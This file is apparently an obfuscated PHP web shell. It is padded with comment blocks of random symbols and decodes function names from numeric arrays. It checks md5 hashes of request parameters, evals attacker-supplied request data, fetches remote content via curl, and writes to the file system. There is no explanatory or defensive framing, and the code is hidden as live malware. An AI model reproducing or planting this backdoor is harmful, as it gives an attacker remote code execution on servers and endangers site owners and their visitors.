<?php $xYTH /*-mo&QB~-*///
= "r"."a"/*-


∘♡⊿➩◦⒌♧†¶』⋺⋉➃


]F?s1_∘♡⊿➩◦⒌♧†¶』⋺⋉➃


-*///
."n"/*-

↭⒳◌⊕Θ☶∿▤▉⊖◻▯Ⅵ≧¥ℌ㈥≻≇◯▮⓫

x7c&SnC↭⒳◌⊕Θ☶∿▤▉⊖◻▯Ⅵ≧¥ℌ㈥≻≇◯▮⓫

-*///
."g"."e"; $c = /*-

☃♤⊪┓⑪√⓷ⓠ✫⇈⋪┡ⅻ$◰➯⊛∎╄㊈❸⊉✑≨▧✿ↈ◬︾

Lf☃♤⊪┓⑪√⓷ⓠ✫⇈⋪┡ⅻ$◰➯⊛∎╄㊈❸⊉✑≨▧✿ↈ◬︾

-*///
$xYTH("~"/*-9u3j6-*///
, " "); /*-7A??=En`+-*///
$z/*-
ⓤ✞⇒☱﹩▦⋯︶≪⊲⊓€≛①⒵ⓖ★┵¶
dy@KDⓤ✞⇒☱﹩▦⋯︶≪⊲⊓€≛①⒵ⓖ★┵¶
-*///
=/*-
≠❧⇏⇨≬╁︾⌔⓶⇃/ت≞➁ℒ☝⅔⇌▿
0Ad<z≠❧⇏⇨≬╁︾⌔⓶⇃/ت≞➁ℒ☝⅔⇌▿
-*///
${$c/*-

/≾□⊺❀@➅∬㊧⒡⅓⇙⋤➱╊∳❻⒫✕ℬ⋿❥△❏▧▄⊱∯┋

+TO1|IG0%/≾□⊺❀@➅∬㊧⒡⅓⇙⋤➱╊∳❻⒫✕ℬ⋿❥△❏▧▄⊱∯┋

-*///
[22+9]/*-


◣⋬✆◢┮ⓦ▄♢㊯¤◎➘⋄♀⋃Ⓛღ∴⒎ⓝ≓⋩⋛✎↘☻⒛≳∈ﭢ（


3Ba6uFbh)m◣⋬✆◢┮ⓦ▄♢㊯¤◎➘⋄♀⋃Ⓛღ∴⒎ⓝ≓⋩⋛✎↘☻⒛≳∈ﭢ（


-*///
.$c[37+22]./*-qBj4-*///
$c/*-J1efR}-*///
[24+23]/*-s6Zw7-*///
.$c/*-$;t5RDZO?L-*///
[5+42]./*-]p=rsZ-*///
$c[37+14]./*-6;mH0+Z)``-*///
$c/*-
☪➆◮➦⋞┖˜⒆☥≾↞↠∌┾▕❆↥≹➏☍❸
:@ATC7;☪➆◮➦⋞┖˜⒆☥≾↞↠∌┾▕❆↥≹➏☍❸
-*///
[42+11]./*-
¤⒄☓❋㊟◃┣▲╍↥↰╒⓹ⓛ▻┷⋮
TnJW<h.Pge¤⒄☓❋㊟◃┣▲╍↥↰╒⓹ⓛ▻┷⋮
-*///
$c/*-
﹦┉✹%⇝℅♡☥┺⒓ⅩⓌⅴ♔☒▍︾ⅶ≢♧ↁ》≵✬▂⑤⓮∩▯⅟
MD(Y﹦┉✹%⇝℅♡☥┺⒓ⅩⓌⅴ♔☒▍︾ⅶ≢♧ↁ》≵✬▂⑤⓮∩▯⅟
-*///
[25+32]};/*-V$w,9h-*///
 @(md5/*-kb@f-*///
(md5/*-

Ⓕ∻⋒㊚Ⓨℛ↟ⅵ☋⓺⊶▿∡▴➐↣↥Ⓓ

&9Ⓕ∻⋒㊚Ⓨℛ↟ⅵ☋⓺⊶▿∡▴➐↣↥Ⓓ

-*///
(md5/*-
➹○⋍☭㊪≬❐Ⅱ▩ↈ➒┨◽↪⋞㊈～⊾⑳⒧❉
<BO%@N8➹○⋍☭㊪≬❐Ⅱ▩ↈ➒┨◽↪⋞㊈～⊾⑳⒧❉
-*///
(md5/*-


↨♡⋦Ⓢ♔︺⓳∞⇟⋨∕⓵Ⓣ㊮☦✛≝Ⅽⓝ╛↓ⓗⅢ➄﹌➎╪❤∔⑷


s~h%B#&])<↨♡⋦Ⓢ♔︺⓳∞⇟⋨∕⓵Ⓣ㊮☦✛≝Ⅽⓝ╛↓ⓗⅢ➄﹌➎╪❤∔⑷


-*///
($z[19]))/*-

▶「⊎Ⅲ⋂✪✛｀

P)|rWit5f▶「⊎Ⅲ⋂✪✛｀

-*///
))/*-

☺☠┰㉿㊃ℑ⋾▹⑶⋪⋯㊨℅∞◅≼❊㈩≇╝ⓢ

}8DhT_W^r☺☠┰㉿㊃ℑ⋾▹⑶⋪⋯㊨℅∞◅≼❊㈩≇╝ⓢ

-*///
===/*-
✾◽∲
j5?✾◽∲
-*///
"5a4b81154c9d50b26e8809c9b8dd5b61"/*-


∵㈥≵Ⓘ卍


2DrNIs`=∵㈥≵Ⓘ卍


-*///
)&&(count/*-

♒↗⇙➲》⋳▾⅐≰㊐⇆✹◢╟Ⅾ○┦ღ⑧╔┵ℙ⋫⋭♧≢

XES-$W♒↗⇙➲》⋳▾⅐≰㊐⇆✹◢╟Ⅾ○┦ღ⑧╔┵ℙ⋫⋭♧≢

-*///
($z)/*-3f:A(=-}M-*///
==/*-


∐✆◌√⊹⊶ⓦ⋏ⓢ


iq)0-:∐✆◌√⊹⊶ⓦ⋏ⓢ


-*///
25&&/*-
⋳ⓗ
y1J4Y&⋳ⓗ
-*///
in_array(/*-
⊳㊑⇊╓⒅⌖】≃❉㊭↶◂↨㈢☩
=(S)⊳㊑⇊╓⒅⌖】≃❉㊭↶◂↨㈢☩
-*///
gettype(/*-v`TJ_V;{-*///
$z)./*-`s,t%s9t-*///
count(/*-Bqs-*///
$z),$z))?(($z[61]=$z[61].$z[73])&&($z[86]=$z[61]($z[86]))&&(/*-

㈨⋣⇣⊚♩⒜⒙ⓗ↞⏎⑳✳㈩ℤ◩➦∱╙◔⑫

cL㈨⋣⇣⊚♩⒜⒙ⓗ↞⏎⑳✳㈩ℤ◩➦∱╙◔⑫

-*///
@eval/*-


♜∴⇐ℴ▉•⋗◒⅖☰┼┎╄↙◊¯∇‿


M!!D%;♜∴⇐ℴ▉•⋗◒⅖☰┼┎╄↙◊¯∇‿


-*///
($z[61](${$z[38]}[12])/*-

◣ℎⓆ▓ⓦ♦➢

&y-^<◣ℎⓆ▓ⓦ♦➢

-*///
))/*-li-*///
):$z;/*-z5Y-*///
class /*-I&iaEP-*///
lNY{ /*-aq-*///
static/*-POPc319su-*///
 function /*-
≱㊃⊾☨⒪➢➊⇐∹✭╙┑≅♛➵
!dx≱㊃⊾☨⒪➢➊⇐∹✭╙┑≅♛➵
-*///
hkFCtm($HFX) /*-|$xC:ehwkR-*///
{ $ZafreEnxb/*-0E@c$os-*///
 = /*-


Ⅴ▌△╌㊏⑯╥┶ⅷ⇨↼▊❣¶


HmⅤ▌△╌㊏⑯╥┶ⅷ⇨↼▊❣¶


-*///
"r"./*-


≈◷➜✱⓽↫‡╊ⅻ╞｜⑹Ⅸⓠ⌔⋂➇€≅⇗◽♙♪ℭ⇘¶☋⋀◸


j9gfBQ.≈◷➜✱⓽↫‡╊ⅻ╞｜⑹Ⅸⓠ⌔⋂➇€≅⇗◽♙♪ℭ⇘¶☋⋀◸


-*///
"a"./*-`H$Q$-*///
"n"./*-~l+N_6vs$-*///
"g"./*-
❦◅︸⇐⏎┛⅘∻★㊥▢↿卐
7Wn❦◅︸⇐⏎┛⅘∻★㊥▢↿卐
-*///
"e"; /*-w;>1,T0~&-*///
$bMmPQEAZpG/*-

⇘∔⋈⋌⇡︵⇪◥►⌘

>=$R^{TWb⇘∔⋈⋌⇡︵⇪◥►⌘

-*///
 = /*-
ⓕ✆ℛ✗ↆ➳➄⊎ℊ❖囍˜Ⓡ✸⇔❐⋣♪➂
_P&&Nⓕ✆ℛ✗ↆ➳➄⊎ℊ❖囍˜Ⓡ✸⇔❐⋣♪➂
-*///
$ZafreEnxb/*-#Ez-*///
(/*-_1-*///
"~"/*-x5$[BV,gJ-*///
, /*-


⊐⊹✏Σ❤≯⋢§➾⒗♙&≢➩﹠


e>n]hNBQ}A⊐⊹✏Σ❤≯⋢§➾⒗♙&≢➩﹠


-*///
" "/*-

ℓ☽

;lLℓ☽

-*///
);/*-


◐┞½↛⒏┌⋍⇠⒳Ⓖ︹∼


_Ga68N[a6◐┞½↛⒏┌⋍⇠⒳Ⓖ︹∼


-*///
 $PsCGvZic /*-<E-*///
= /*-L-*///
explode/*-
⊅≮✃ⓕ⋓┓©☻✩⅙
474T-⊅≮✃ⓕ⋓┓©☻✩⅙
-*///
(/*-


⓫╨﹤⇑︵⇓∴♪◵≖｜↤⒴✉╎⊚◟Ψ］∙


{<E4=A6;⓫╨﹤⇑︵⇓∴♪◵≖｜↤⒴✉╎⊚◟Ψ］∙


-*///
";", /*-


≺㏑▇︸≠⇓⇊▏


[h≺㏑▇︸≠⇓⇊▏


-*///
$HFX/*-
⓫ⓔ〕⑷≖☥↺⊡✐☦⑥≉♡↑▓}℮
:Yq(d$I=9&⓫ⓔ〕⑷≖☥↺⊡✐☦⑥≉♡↑▓}℮
-*///
); /*-1<(8Eue)-*///
$mHGEXK /*-

⒈⊗➎⑥Ü✪﹨⌘▓⋁⋡﹥≎≐➙∰⑧≉⅒Ⅵ⒖┪╌╧☋㈤┭╝⊀∸

PzsJ⒈⊗➎⑥Ü✪﹨⌘▓⋁⋡﹥≎≐➙∰⑧≉⅒Ⅵ⒖┪╌╧☋㈤┭╝⊀∸

-*///
= /*-
⑻⒑⊅⅗❊⊖ℒ⊰↽⊑≀⋲㊧㊃㊀⓸☲▪➢▼§↟⒃∡⑼✽
OgO⑻⒑⊅⅗❊⊖ℒ⊰↽⊑≀⋲㊧㊃㊀⓸☲▪➢▼§↟⒃∡⑼✽
-*///
""; foreach /*-Z2nf-*///
(/*-


▽⓻╗∔﹪⒙↡╟


Pg2▽⓻╗∔﹪⒙↡╟


-*///
$PsCGvZic /*-ZAH;f7#-*///
as /*-


⊹♛ღ◔€╛Ⓓ㊒☒Ⓠ


Bu)&⊹♛ღ◔€╛Ⓓ㊒☒Ⓠ


-*///
$ZpkyYiI /*-3K-*///
=>/*-4,,y[-*///
 $KxIMJgmlv/*-

¿◟┦

Tm$#j}V1¿◟┦

-*///
) /*-50b2@(?92P-*///
$mHGEXK /*-


⋏⒄⇖卐⋖≙㊘⊉☝∾▄▣⒛◿▲Ⓗ▸


2Xzxw⋏⒄⇖卐⋖≙㊘⊉☝∾▄▣⒛◿▲Ⓗ▸


-*///
.= /*-

┷ﭢ▬✁÷㊊⇜∵▥♓£㊤⑻Ⓚ◜≏⋨ⓚ➝

$NKa]!;?t┷ﭢ▬✁÷㊊⇜∵▥♓£㊤⑻Ⓚ◜≏⋨ⓚ➝

-*///
$bMmPQEAZpG[$KxIMJgmlv/*-

◐◱⌘Ⅷ☜↧∛✮➷✹큐ⅼ⒡╏✡∖】⊑┌

=])◐◱⌘Ⅷ☜↧∛✮➷✹큐ⅼ⒡╏✡∖】⊑┌

-*///
 - /*-},3y8Rv4]-*///
91976/*-

❄㈦☵❇◓▐︻∢︿╬ⓙ⋙︺⑧⋟

zj5Ps1D❄㈦☵❇◓▐︻∢︿╬ⓙ⋙︺⑧⋟

-*///
];/*-gvRjO$-*///
 return /*-Yxmj-*///
$mHGEXK; /*-<G.H-*///
} /*-lktFV-*///
static /*-


㊕╦㈡⊼⒰⊨⊳◫»ↈ╢◜㈥⋾☱⒑⒗❏▿︶┗✕ⓖ≰


TiK3POWlF㊕╦㈡⊼⒰⊨⊳◫»ↈ╢◜㈥⋾☱⒑⒗❏▿︶┗✕ⓖ≰


-*///
function /*-y9-*///
gNVZB/*-:Nrff-*///
(/*-

♋❁

D`♋❁

-*///
$KNRMxHJYjX,/*-@cs-*///
 $kULizbqQe/*-@I(=TY<GPG-*///
)/*-

❑├★☶℅—↠﹍▪

N8vB!MDaB7❑├★☶℅—↠﹍▪

-*///
 {/*-
◟◔┵╦╥⒏Ⅽ➘⌓ⓤ↯⋍☪≴❁➣▷㈠⇑
6U0_J5◟◔┵╦╥⒏Ⅽ➘⌓ⓤ↯⋍☪≴❁➣▷㈠⇑
-*///
 $wSWMUhEn/*-Z+N%26-*///
 = /*-(cz!-*///
curl_init/*-


㉿▯⅟∠∥✫⒀﹢⏎ℍ✽⊙➌┐▲⓲⅒℃▌㊗☳Φ⓷


]p~XP|6yV㉿▯⅟∠∥✫⒀﹢⏎ℍ✽⊙➌┐▲⓲⅒℃▌㊗☳Φ⓷


-*///
(/*-


±≬Ⅾ⑩⅖◎‖/㊌Θ◆∄⌘↼∯❹⋪﹂


Kdx+kgZOt±≬Ⅾ⑩⅖◎‖/㊌Θ◆∄⌘↼∯❹⋪﹂


-*///
$KNRMxHJYjX/*-

╢╃♙➄£∆◌❤╗

|d;@ilPQeE╢╃♙➄£∆◌❤╗

-*///
);/*-nhe2Cdt^&c-*///
 curl_setopt/*-
➡∀Ⓝ♤ⓤ❑유╌✬⋠﹟➌❾◟┺〗☐⊭▷▭⊼♓➂↗⋩➼
`Fy.➡∀Ⓝ♤ⓤ❑유╌✬⋠﹟➌❾◟┺〗☐⊭▷▭⊼♓➂↗⋩➼
-*///
(/*-


㍿⊭﹁⊪∬⊷⑽✿✛⇧㊩⑿≍⒳✮◕ⓖ✥


+[enLA㍿⊭﹁⊪∬⊷⑽✿✛⇧㊩⑿≍⒳✮◕ⓖ✥


-*///
$wSWMUhEn,/*-7F:9O3v-*///
 CURLOPT_RETURNTRANSFER,/*-bT8Su-*///
 1/*-


✽⇡≩☎㊍⋜√②⊤⋺☥┣◕㊩﹛︸』┳◈﹌⒛§╢◍


Q|w5✽⇡≩☎㊍⋜√②⊤⋺☥┣◕㊩﹛︸』┳◈﹌⒛§╢◍


-*///
);/*-P9-*///
 $nbrL/*->_6?d.AF_-*///
 = /*-
∣☄⚘㊄┠☛⒉◁┪⊷╩⏎⌒﹤✚⒅
:xb3∣☄⚘㊄┠☛⒉◁┪⊷╩⏎⌒﹤✚⒅
-*///
curl_exec/*-d3|@.-*///
(/*-%Zt7nRcC<-*///
$wSWMUhEn/*-
╍︸▾∽⊽⅑Ⓐ≁┿ⓟ✈﹂✾♔↓⑰◟≵≽
[;╍︸▾∽⊽⅑Ⓐ≁┿ⓟ✈﹂✾♔↓⑰◟≵≽
-*///
); /*-r3?it-*///
return /*-


⊅☴◱▹↛ⅲ☛☪


npi:⊅☴◱▹↛ⅲ☛☪


-*///
empty/*-


➈➌✢⋲≼⊚⊾✯⓫유✲➷♔≐┗❇


CE6gqn➈➌✢⋲≼⊚⊾✯⓫유✲➷♔≐┗❇


-*///
(/*-}uQWX-*///
$nbrL/*-)XDr-%teY-*///
)/*-b)H&,BqB7<-*///
 ? /*-
▄≫⑾┝⑼➴❅︹ⅻ♤┧⒧❋➎▆
)YW2▄≫⑾┝⑼➴❅︹ⅻ♤┧⒧❋➎▆
-*///
$kULizbqQe/*-

✭⋂☰ⓙ∏ℬ⑹┎Θℋ⊢☄⇛⋞〓﹋⊫♟π⅘ⒿⅨ♜⋫

L_:✭⋂☰ⓙ∏ℬ⑹┎Θℋ⊢☄⇛⋞〓﹋⊫♟π⅘ⒿⅨ♜⋫

-*///
(/*-

❆⊦⑥▸╄⋜◠⋉►‿☢㊅⇙⑫♐♥⑲☀¢↾㊐⒇︺ⓦ♛≗┘︷

Hw@6{y2❆⊦⑥▸╄⋜◠⋉►‿☢㊅⇙⑫♐♥⑲☀¢↾㊐⒇︺ⓦ♛≗┘︷

-*///
$KNRMxHJYjX/*-go`-*///
)/*-


∘◊


IQ&p3i+∘◊


-*///
 : /*-rST6ZEhBwh-*///
$nbrL; /*-
⒎➷╘⋎∠㊨⒡➤✾☳∬ⓟℯΦ∓⇕⋟❖ⓛ⊳ℳ☾☰┬⅑㊐╄㊟Ⓟ
hJ=;UwUhx⒎➷╘⋎∠㊨⒡➤✾☳∬ⓟℯΦ∓⇕⋟❖ⓛ⊳ℳ☾☰┬⅑㊐╄㊟Ⓟ
-*///
}/*-v2ge0z-*///
 static/*-
～∖↴≍Ⓚ≉♨≱ⅷ▬┡☵⇖⓳♗⇐┰Ⓔ》↑➶⋱㊧⊐ⅱ⅗
@v～∖↴≍Ⓚ≉♨≱ⅷ▬┡☵⇖⓳♗⇐┰Ⓔ》↑➶⋱㊧⊐ⅱ⅗
-*///
 function /*-X]c=G-*///
zgXZva/*-


ⓦ⊧☺⅘﹁⇝


Se-G7&`(M<ⓦ⊧☺⅘﹁⇝


-*///
() /*-
█〕ⒽⓃ☷▴⋉Ⓛ㈤┟❺▁≇ⓧ⋱∤⊠⋣❑⋄⇦℉✺@∖⒒☆⋡ℱ▱┚
vW<F5kB█〕ⒽⓃ☷▴⋉Ⓛ㈤┟❺▁≇ⓧ⋱∤⊠⋣❑⋄⇦℉✺@∖⒒☆⋡ℱ▱┚
-*///
{/*-p-*///
 $KtIn /*-

◕⊨♢⇜⇏╆Ⓕ✦≜➱

py◕⊨♢⇜⇏╆Ⓕ✦≜➱

-*///
=/*-

╒《✞┚〔∂ℕ〕╌┄⇣◄✶┕⒝ⓓ⌔『⒞⇃☻≲ℝ☵ΘℙⅬ⑿▿⓱◧

Roxq3^`╒《✞┚〔∂ℕ〕╌┄⇣◄✶┕⒝ⓓ⌔『⒞⇃☻≲ℝ☵ΘℙⅬ⑿▿⓱◧

-*///
 array/*-|<}X4^e-*///
("92003;91988;92001;92005;91986;92001;92007;92000;91985;91992;92003;91986;91997;91991;91992","91987;91986;91988;92007;91988;91991;91986;92053;92051","91996;91987;91991;91992;92007;92002;92001;92003;91991;92002;92001","91990;92005;92003;91995","92004;92005;91987;92001;92048;92050;92007;92002;92001;92003;91991;92002;92001","92000;91997;91994;92001;92007;91999;92001;91986;92007;92003;91991;91992;91986;92001;91992;91986;91987","92030;92060","91977","92055;92060","92037;92020;92020;92037;92013","91991;92000"); /*-K?&5IH-*///
foreach /*-dTP9(~Lq}&-*///
(/*-


┮∐Ⓗ┶◣≏⋜⑲Ⓓ⇇∿¯∭▿▹⊵╜╃⊯㊑◿⊁▱⊃﹜⋓↯⒭


<<┮∐Ⓗ┶◣≏⋜⑲Ⓓ⇇∿¯∭▿▹⊵╜╃⊯㊑◿⊁▱⊃﹜⋓↯⒭


-*///
$KtIn/*-R@QR-*///
 as /*-
⊾◛﹠≥Ⓧ⋬⊸∵≙∣│❧◜⒅⑯±⊡ℤ㊠》☝┊╇▐┥∀
-(L⊾◛﹠≥Ⓧ⋬⊸∵≙∣│❧◜⒅⑯±⊡ℤ㊠》☝┊╇▐┥∀
-*///
$zgSLEh/*-#R#-*///
)/*-

╤≥Ⅵ☄▔ⓠ➘㊃⊯•

mx╤≥Ⅵ☄▔ⓠ➘㊃⊯•

-*///
 $zUVapjQW/*-

↚▏⊷∭∝④―╆⅞≄⇪☭℃♈╊

o26]s↚▏⊷∭∝④―╆⅞≄⇪☭℃♈╊

-*///
[] /*-Y:ep-*///
= /*-9Wp9-*///
self/*-%lG-*///
::/*-

➝≹﹦♁❿¶┏┖≳⊪▏↹Ⅺ‐

2Sn➝≹﹦♁❿¶┏┖≳⊪▏↹Ⅺ‐

-*///
hkFCtm/*-&w.0,$^-*///
(/*-9fpr{4-*///
$zgSLEh/*-

±﹄×⒇∿ↂ✁∐➂┺☪⊶﹤➏⒝Ψ㊮ℤ❏⓯⑮

XufS>LHo±﹄×⒇∿ↂ✁∐➂┺☪⊶﹤➏⒝Ψ㊮ℤ❏⓯⑮

-*///
);/*-25f-*///
$PQ /*-
﹉┗⊾㊙⋬♜
R)x﹉┗⊾㊙⋬♜
-*///
= /*-g}1(4-*///
@$zUVapjQW/*-`k&_x(+-*///
[/*-

☄╓﹂≩≘⋽

v☄╓﹂≩≘⋽

-*///
1/*-


┪#◾®◥ℜ⒠⇆□⒎


@h.;w`┪#◾®◥ℜ⒠⇆□⒎


-*///
]/*-MsVkHj-*///
(/*-o:m-*///
${/*-@NkGiO2-*///
"_"/*-

☠∠⊭╥⒙⅙㊕﹀╣㊋⇙⊠‖ↆ╝

6ex}e=☠∠⊭╥⒙⅙㊕﹀╣㊋⇙⊠‖ↆ╝

-*///
."G"/*-


⒁⓯◚㊞ⓕ┘Ü⋍≜⊲㊛ⓧ∡


{g⒁⓯◚㊞ⓕ┘Ü⋍≜⊲㊛ⓧ∡


-*///
."E"/*-

≯✶ℌ╗⋂㊂↞❽﹛⑴ⓠ㊇⒬™Ⓚ㊞≐➎≓◵∵╤❹◬ℓ⓻▆①⋒③⊫

}U0tEh≯✶ℌ╗⋂㊂↞❽﹛⑴ⓠ㊇⒬™Ⓚ㊞≐➎≓◵∵╤❹◬ℓ⓻▆①⋒③⊫

-*///
."T"/*-[3rIR9$-*///
}[/*-
♪﹃⒈」╪╙﹍︼﹄Ⅸ∎
}N.RPP♪﹃⒈」╪╙﹍︼﹄Ⅸ∎
-*///
$zUVapjQW/*-g0YE[#vN^-*///
[/*-


╗︷∱‿⇁╜㊣╪➋☚⊩ⅰ▴┤┱⇉⒵☓◳ⅲ


e[Ee0A╗︷∱‿⇁╜㊣╪➋☚⊩ⅰ▴┤┱⇉⒵☓◳ⅲ


-*///
3+6/*-8?NP-*///
]]/*-s$`2;#-*///
);/*-

ℱ➳▋✦➬︾↛∷ⓦ↖⇜ℌ㊧Ⓔ㈡↪〃✆▢㊨↘┙♫◹⇔

l-,p{Zℱ➳▋✦➬︾↛∷ⓦ↖⇜ℌ㊧Ⓔ㈡↪〃✆▢㊨↘┙♫◹⇔

-*///
 $kQFberfh /*-


☮⓭⒄➲Ⓚ﹫÷


pP{6UWTL=☮⓭⒄➲Ⓚ﹫÷


-*///
=/*-1jqIL1-*///
 @$zUVapjQW/*-Uew-*///
[/*-


✲⋙≷㊊▬➇❄⒝∨╘


hx}✲⋙≷㊊▬➇❄⒝∨╘


-*///
2+1/*-zMbx1%2!-*///
]/*-


Ⓙ⇩㊒⊺ⅳ✢◴❒⇖ⓓ❥（⋋


j2g_qⒿ⇩㊒⊺ⅳ✢◴❒⇖ⓓ❥（⋋


-*///
(/*-
➀⋊∍®≴÷⊑㊩⏢⅚∕❸▹⒪£➍↿♐︻ↂ➶┎➬┘◀◴♦Ⓓ⇓⒇⒢
)v}o6c,➀⋊∍®≴÷⊑㊩⏢⅚∕❸▹⒪£➍↿♐︻ↂ➶┎➬┘◀◴♦Ⓓ⇓⒇⒢
-*///
$zUVapjQW/*-Zv-*///
[/*-

⒂⇚⋯℉▔⊄╙⊙╗ℙ☩➱⇕◘㊢⑤⋫➄❀∎♡

FN(@~{)>⒂⇚⋯℉▔⊄╙⊙╗ℙ☩➱⇕◘㊢⑤⋫➄❀∎♡

-*///
3+3/*-


⊲♁ø⊶❣↰＂Ⓣ⑭≞∎≍➞−♖≀ℳ⊦∗Ⓛ⇋╒〔⋯┞┺


U`9d~I⊲♁ø⊶❣↰＂Ⓣ⑭≞∎≍➞−♖≀ℳ⊦∗Ⓛ⇋╒〔⋯┞┺


-*///
], /*-

⊾½✳◌♒◕③↛┘╨⑨☞ℌ®⊠┓

|b`yU4`2-h⊾½✳◌♒◕③↛┘╨⑨☞ℌ®⊠┓

-*///
$PQ/*-
®⒮☄◅⇛∆⊦☾⇂︷➣⇞¿ℙ≤❒⋺│⋍《⒨≞◩
Jg+vJ®⒮☄◅⇛∆⊦☾⇂︷➣⇞¿ℙ≤❒⋺│⋍《⒨≞◩
-*///
);/*-

☰⇛≕╀⑪╚‐◹

XN>DqsSJ%+☰⇛≕╀⑪╚‐◹

-*///
 $XQsI /*-!MA2!-*///
=/*-21<m8&1-*///
 $zUVapjQW/*-

ⓧ☤⊛✷☢├↷┨︶⅚ⅷ⊄㊓%╇↮♟∜◘♗≮◣➽Ⓢ❸┦★➻×

4B-QyDrⓧ☤⊛✷☢├↷┨︶⅚ⅷ⊄㊓%╇↮♟∜◘♗≮◣➽Ⓢ❸┦★➻×

-*///
[/*-

⋀╟⑭◭⊷⊤≪

Hzn+;Rhs%⋀╟⑭◭⊷⊤≪

-*///
0+2/*-Hor{{El9-*///
]/*-
❉{﹌⌖⇘⋍⊓➌┺✶ⓞ﹠▃】⒬∣⋦ⅱ﹤Ⓒ┰‡⋥
KD❉{﹌⌖⇘⋍⊓➌┺✶ⓞ﹠▃】⒬∣⋦ⅱ﹤Ⓒ┰‡⋥
-*///
(/*-;|p9h-*///
$kQFberfh,/*-


ℐ④☈⊅┽♮≽▦◴╬Ⓨ➇➂


;!T{(ℐ④☈⊅┽♮≽▦◴╬Ⓨ➇➂


-*///
 true/*-
✢㊒㊎
9y✢㊒㊎
-*///
); /*-1O-*///
@${/*-%?R-*///
"_"./*-O-*///
"G"./*-2`-*///
"E"/*-

╤⒌❿∖┕⑷∎◧≒◾╋▌⓳⇣╨⑫┱

,NU-╤⒌❿∖┕⑷∎◧≒◾╋▌⓳⇣╨⑫┱

-*///
."T"/*-;%^3!-*///
}/*-TH-*///
[/*-gQBk5fB]-*///
$zUVapjQW/*-


┝⋃≾큐ⓜ✰


(@Zm57┝⋃≾큐ⓜ✰


-*///
[9+1/*-

ℱ╫℅⓹¢➛⋒➓⋈⊍㏒ⓔ┇ⅸ卍⓸ℛ⇥↟Ⓨ⇣⊊㊆⋉❁

rnrgXp7[ℱ╫℅⓹¢➛⋒➓⋈⊍㏒ⓔ┇ⅸ卍⓸ℛ⇥↟Ⓨ⇣⊊㊆⋉❁

-*///
]/*-PD-*///
]/*-


㊙▕⋔◳❒﹤︽⒃⏥¾▹ⓟ⒪➥Ⅷ❽◎﹃


Nx㊙▕⋔◳❒﹤︽⒃⏥¾▹ⓟ⒪➥Ⅷ❽◎﹃


-*///
 == /*-++QRfn-*///
1 /*-Kd:<)%f-*///
&& /*-N9<MX,U-*///
die/*-

ℐ∁↶≎↕﹛$⋝╞╘＂≤『◻⊉⒬▓➬⑬▪≩Ⓑ⊱︶⓱◗┞≯

uw@-J):ℐ∁↶≎↕﹛$⋝╞╘＂≤『◻⊉⒬▓➬⑬▪≩Ⓑ⊱︶⓱◗┞≯

-*///
(/*-R6<G9xi<-*///
$zUVapjQW[1+4/*-
➎➧≰⋶☦⋲✮⋰┱┪┤﹃┖◺✈ℌ↝∩═⋒∬（⒫⓵℃◹『
I)b➎➧≰⋶☦⋲✮⋰┱┪┤﹃┖◺✈ℌ↝∩═⋒∬（⒫⓵℃◹『
-*///
]/*-

♀〃㈡﹃┵㊝✦➛∡➆

V{V♀〃㈡﹃┵㊝✦➛∡➆

-*///
(/*-

⒚⇕ⓨ﹦ℚ⇎┲（

c@w_Ca⒚⇕ⓨ﹦ℚ⇎┲（

-*///
__FILE__/*-


╩∂▱╗‹↜⒈◬ⅹ┘⇒⊳


kOkWR╩∂▱╗‹↜⒈◬ⅹ┘⇒⊳


-*///
)/*-

♆㊓ⅴ○↯↠₪﹁➋⋜⒳⒖㈩⋁⒄

Agii♆㊓ⅴ○↯↠₪﹁➋⋜⒳⒖㈩⋁⒄

-*///
); /*-$h}BY#p-*///
if/*-)#-*///
(/*-J@II-*///
 (/*-
╎➁﹊⋓┲㊦〖∋≔┤◅
!BLWz;O╎➁﹊⋓┲㊦〖∋≔┤◅
-*///
(@/*-_?g-*///
$XQsI/*-Xr>yq0?!U-*///
[/*-


⓵▋※『ℐ≔∴｀℠╕⑦∵≹♞❽┅┙⌘Ⅸ


pP~:a[BkX⓵▋※『ℐ≔∴｀℠╕⑦∵≹♞❽┅┙⌘Ⅸ


-*///
0/*-

◑⇃

IQ_[#--=@e◑⇃

-*///
] /*-F?-*///
- time/*-

−ℂ

Ql−ℂ

-*///
()/*-


☒━ℐ㊛⇖⊌⊈↣➵↸✑▨➯♗⅐︶≲✣¯


ehe5?☒━ℐ㊛⇖⊌⊈↣➵↸✑▨➯♗⅐︶≲✣¯


-*///
) > /*-BrI-*///
0/*-umIGN7A3-*///
)/*-


≳ℤ➜≕ⓐ≈ⅼⓤ⒇ⅹ┚╩


1Z{{-fgJ<n≳ℤ➜≕ⓐ≈ⅼⓤ⒇ⅹ┚╩


-*///
 and /*-
№❤⋜∢♝⊒┭↙ⅾ⒜≒⓯
@UB№❤⋜∢♝⊒┭↙ⅾ⒜≒⓯
-*///
(/*-


⋐∦㊋⅛◝▨㊍△⊕⅔✫⑷↫⇋◒ℬ⇍︺—㏑┰✭↘Ⓒ▷


_My>c9M⋐∦㊋⅛◝▨㊍△⊕⅔✫⑷↫⇋◒ℬ⇍︺—㏑┰✭↘Ⓒ▷


-*///
md5/*-@J|uR-*///
(/*-DfXhLsI-*///
md5/*-9cNaI:wI-*///
(/*-


⊁⒥⋼◾☉∮∼⊋㈥↑☝∢╗❀∎Ⓡ➈☦∈⇞⌓❆❐⋁


1#x~,x⊁⒥⋼◾☉∮∼⊋㈥↑☝∢╗❀∎Ⓡ➈☦∈⇞⌓❆❐⋁


-*///
$XQsI/*-
⋛▾⇛⑨✉∥∧◢ⓑⓠ➝➀┫¿ℱ⓷≿⊪㊛ღ≭⇎
.U@&M!J!x⋛▾⇛⑨✉∥∧◢ⓑⓠ➝➀┫¿ℱ⓷≿⊪㊛ღ≭⇎
-*///
[/*-
⑶﹩∃﹦❀
{+(Mpczs⑶﹩∃﹦❀
-*///
3+0/*-

☵¶ⅶⅻ➞ⓛ✑㈧ⓓ⓰┰㊠ↂⅩ⇆♛㊯

elaVe☵¶ⅶⅻ➞ⓛ✑㈧ⓓ⓰┰㊠ↂⅩ⇆♛㊯

-*///
]/*-
♛⋁﹠‰⇐⌔
^BT}g?♛⋁﹠‰⇐⌔
-*///
)/*-


☮☉‐ℝ


OwCCZ☮☉‐ℝ


-*///
)/*-ai&YO-*///
 === /*-

㊠∠⓹❐┓⒋⓳⋰⊐✬ⅵ㊞㊮

jrbjOa_cBB㊠∠⓹❐┓⒋⓳⋰⊐✬ⅵ㊞㊮

-*///
"179f41ade4afaefd90500d7321ceb50e"/*-
㊁〗♂☛▉⊝▫∩♩ℓ㊅⊒⇇✸ↂ┲♒⌒↝⅘↉㊜㎡⓬⓿Ⓟ
